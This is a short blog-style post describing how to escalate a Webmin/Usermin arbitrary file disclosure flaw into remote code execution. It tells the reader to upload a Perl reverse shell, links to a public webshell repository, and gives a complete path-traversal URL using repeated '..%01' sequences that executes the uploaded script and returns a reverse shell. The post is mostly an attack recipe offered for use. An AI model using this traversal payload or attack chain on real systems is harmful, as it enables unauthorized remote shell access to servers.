Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure (Perl)

https://www.exploit-db.com/exploits/2017/

Actually it's not just a local file disclosure vulnerability, It's a LFI-like vulnerability. We can get a shell if we can upload a file.

Upload a Perl reverse shell to /tmp/Reverse.cgi, and add execute privilege:

https://github.com/xiaoxiaoleo/xiao-webshell/blob/master/perl/Reverse.pl

Then access in web broswer:

http://<target>/unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/tmp/Reverse.cgi

Get the reverse shell.

相关文章:

  • 2022-12-23
  • 2022-01-01
  • 2022-12-23
  • 2022-01-04
  • 2021-08-14
  • 2021-12-20
  • 2021-10-17
  • 2021-08-05
猜你喜欢
  • 2021-04-09
  • 2021-11-09
  • 2021-08-20
  • 2022-12-23
  • 2021-05-14
  • 2021-09-27
  • 2021-07-21
相关资源
相似解决方案